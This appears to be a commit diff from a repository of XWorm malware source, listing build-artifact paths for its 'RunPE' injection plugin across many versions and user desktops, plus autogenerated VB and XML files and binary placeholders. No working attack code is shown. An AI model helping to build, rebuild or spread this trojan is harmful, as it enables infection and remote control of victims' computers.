C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.AssemblyReference.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbprojAssemblyReference.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Dark Worm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbprojAssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\XWorm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.AssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\XWorm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.AssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
C:\Users\byt3d4sh\Desktop\src 2\XWorm\bin\Debug\Plugins\RunPE.dll
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.AssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\PE SRC\RunPE\obj\Debug\Plugin.Resources.resources
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\PE SRC\RunPE\obj\Debug\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\byt3d4sh\Desktop\src 2\Plugins\PE SRC\RunPE\obj\Debug\RunPE.dll
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,26 @@
|
||||
<?xml version="1.0"?>
|
||||
<doc>
|
||||
<assembly>
|
||||
<name>
|
||||
RunPE
|
||||
</name>
|
||||
</assembly>
|
||||
<members>
|
||||
<member name="T:RunPE.My.Resources.Resources">
|
||||
<summary>
|
||||
A strongly-typed resource class, for looking up localized strings, etc.
|
||||
</summary>
|
||||
</member>
|
||||
<member name="P:RunPE.My.Resources.Resources.ResourceManager">
|
||||
<summary>
|
||||
Returns the cached ResourceManager instance used by this class.
|
||||
</summary>
|
||||
</member>
|
||||
<member name="P:RunPE.My.Resources.Resources.Culture">
|
||||
<summary>
|
||||
Overrides the current thread's CurrentUICulture property for all
|
||||
resource lookups using this strongly typed resource class.
|
||||
</summary>
|
||||
</member>
|
||||
</members>
|
||||
</doc>
|
||||
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,7 @@
|
||||
' <autogenerated/>
|
||||
Option Strict Off
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName:=".NET Framework 4")>
|
||||
@@ -0,0 +1,7 @@
|
||||
' <autogenerated/>
|
||||
Option Strict Off
|
||||
Option Explicit On
|
||||
|
||||
Imports System
|
||||
Imports System.Reflection
|
||||
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName:=".NET Framework 4.8")>
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1 @@
|
||||
2f9cef47a466b7036b0b8a4318bece29066b628de15d944e3e36d55c37d5b697
|
||||
@@ -0,0 +1,8 @@
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\bin\Release\RunPE.dll
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\bin\Release\RunPE.pdb
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\obj\Release\RunPE.vbproj.AssemblyReference.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\obj\Release\Plugin.Resources.resources
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\obj\Release\RunPE.vbproj.GenerateResource.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\obj\Release\RunPE.vbproj.CoreCompileInputs.cache
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\obj\Release\RunPE.dll
|
||||
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\PE SRC\RunPE\obj\Release\RunPE.pdb
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Reference in New Issue
Block a user